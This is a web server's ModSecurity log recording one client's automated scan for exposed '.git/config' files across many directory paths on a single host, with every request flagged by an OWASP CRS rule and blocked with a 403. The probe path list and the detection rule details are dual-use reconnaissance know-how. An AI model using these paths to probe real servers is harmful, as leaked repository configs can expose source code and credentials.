[Wed May 22 09:56:53.902466 2024] [:error] [pid 3395384] [client 91.215.85.43:37058] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /includes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_LgAAAAU"]
[Wed May 22 09:56:53.903089 2024] [:error] [pid 3395384] [client 91.215.85.43:37058] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_LgAAAAU"]
[Wed May 22 09:56:53.903693 2024] [:error] [pid 3395384] [client 91.215.85.43:37058] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_LgAAAAU"]
[Wed May 22 09:56:53.910762 2024] [:error] [pid 3395394] [client 91.215.85.43:37012] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /beta/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32ewAAAAg"]
[Wed May 22 09:56:53.913639 2024] [:error] [pid 3395360] [client 91.215.85.43:36980] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIgAAAAM"]
[Wed May 22 09:56:53.914351 2024] [:error] [pid 3395360] [client 91.215.85.43:36980] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIgAAAAM"]
[Wed May 22 09:56:53.914797 2024] [:error] [pid 3395360] [client 91.215.85.43:36980] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIgAAAAM"]
[Wed May 22 09:56:53.916261 2024] [:error] [pid 3395392] [client 91.215.85.43:36990] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8Z0AAAAAY"]
[Wed May 22 09:56:53.916579 2024] [:error] [pid 3395394] [client 91.215.85.43:37012] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32ewAAAAg"]
[Wed May 22 09:56:53.916904 2024] [:error] [pid 3395396] [client 91.215.85.43:37252] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /flock/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1YAAAAAo"]
[Wed May 22 09:56:53.917080 2024] [:error] [pid 3395396] [client 91.215.85.43:37252] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1YAAAAAo"]
[Wed May 22 09:56:53.917216 2024] [:error] [pid 3395396] [client 91.215.85.43:37252] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1YAAAAAo"]
[Wed May 22 09:56:53.918508 2024] [:error] [pid 3395359] [client 91.215.85.43:37226] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /s3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpRQAAAAI"]
[Wed May 22 09:56:53.918688 2024] [:error] [pid 3395359] [client 91.215.85.43:37226] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpRQAAAAI"]
[Wed May 22 09:56:53.918838 2024] [:error] [pid 3395359] [client 91.215.85.43:37226] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpRQAAAAI"]
[Wed May 22 09:56:53.920436 2024] [:error] [pid 3395357] [client 91.215.85.43:37034] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvDAAAAAA"]
[Wed May 22 09:56:53.920621 2024] [:error] [pid 3395357] [client 91.215.85.43:37034] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvDAAAAAA"]
[Wed May 22 09:56:53.920761 2024] [:error] [pid 3395357] [client 91.215.85.43:37034] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvDAAAAAA"]
[Wed May 22 09:56:53.921317 2024] [:error] [pid 3395392] [client 91.215.85.43:36990] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8Z0AAAAAY"]
[Wed May 22 09:56:53.921451 2024] [:error] [pid 3395392] [client 91.215.85.43:36990] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8Z0AAAAAY"]
[Wed May 22 09:56:53.921847 2024] [:error] [pid 3395394] [client 91.215.85.43:37012] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32ewAAAAg"]
[Wed May 22 09:56:54.057773 2024] [:error] [pid 3395393] [client 91.215.85.43:37134] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zk2lRpnsJP7yDq0rGFtwRAAAAAc"]
[Wed May 22 09:56:54.058352 2024] [:error] [pid 3395393] [client 91.215.85.43:37134] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zk2lRpnsJP7yDq0rGFtwRAAAAAc"]
[Wed May 22 09:56:54.058706 2024] [:error] [pid 3395393] [client 91.215.85.43:37134] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zk2lRpnsJP7yDq0rGFtwRAAAAAc"]
[Wed May 22 09:56:54.601422 2024] [:error] [pid 3395395] [client 91.215.85.43:37290] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "Zk2lRgYtOgQFTVNZreu5tgAAAAk"]
[Wed May 22 09:56:54.601642 2024] [:error] [pid 3395358] [client 91.215.85.43:37394] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "Zk2lRsLR5UJ49OezHSs-HgAAAAE"]
[Wed May 22 09:56:54.601945 2024] [:error] [pid 3395395] [client 91.215.85.43:37290] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "Zk2lRgYtOgQFTVNZreu5tgAAAAk"]
[Wed May 22 09:56:54.602247 2024] [:error] [pid 3395358] [client 91.215.85.43:37394] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "Zk2lRsLR5UJ49OezHSs-HgAAAAE"]
[Wed May 22 09:56:54.602342 2024] [:error] [pid 3395395] [client 91.215.85.43:37290] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "Zk2lRgYtOgQFTVNZreu5tgAAAAk"]
[Wed May 22 09:56:54.602713 2024] [:error] [pid 3395358] [client 91.215.85.43:37394] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "Zk2lRsLR5UJ49OezHSs-HgAAAAE"]
[Wed May 22 09:56:54.606033 2024] [:error] [pid 3395359] [client 91.215.85.43:37256] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /store/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "Zk2lRpTMfOoR75vS6_DpRgAAAAI"]
[Wed May 22 09:56:54.606464 2024] [:error] [pid 3395359] [client 91.215.85.43:37256] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "Zk2lRpTMfOoR75vS6_DpRgAAAAI"]
[Wed May 22 09:56:54.606702 2024] [:error] [pid 3395359] [client 91.215.85.43:37256] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "Zk2lRpTMfOoR75vS6_DpRgAAAAI"]
[Wed May 22 09:56:54.607869 2024] [:error] [pid 3395360] [client 91.215.85.43:37268] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /site/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "Zk2lRlQmnWT4N4NxlYdmIwAAAAM"]
[Wed May 22 09:56:54.608162 2024] [:error] [pid 3395360] [client 91.215.85.43:37268] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "Zk2lRlQmnWT4N4NxlYdmIwAAAAM"]
[Wed May 22 09:56:54.608408 2024] [:error] [pid 3395360] [client 91.215.85.43:37268] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "Zk2lRlQmnWT4N4NxlYdmIwAAAAM"]
[Wed May 22 09:56:54.608972 2024] [:error] [pid 3395396] [client 91.215.85.43:37306] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wiki/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "Zk2lRudio4tMHzszuH-1YQAAAAo"]
[Wed May 22 09:56:54.609267 2024] [:error] [pid 3395396] [client 91.215.85.43:37306] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "Zk2lRudio4tMHzszuH-1YQAAAAo"]
[Wed May 22 09:56:54.609506 2024] [:error] [pid 3395396] [client 91.215.85.43:37306] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "Zk2lRudio4tMHzszuH-1YQAAAAo"]
